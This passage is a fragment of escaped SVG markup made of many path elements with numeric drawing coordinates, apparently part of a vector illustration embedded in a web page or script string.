d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path 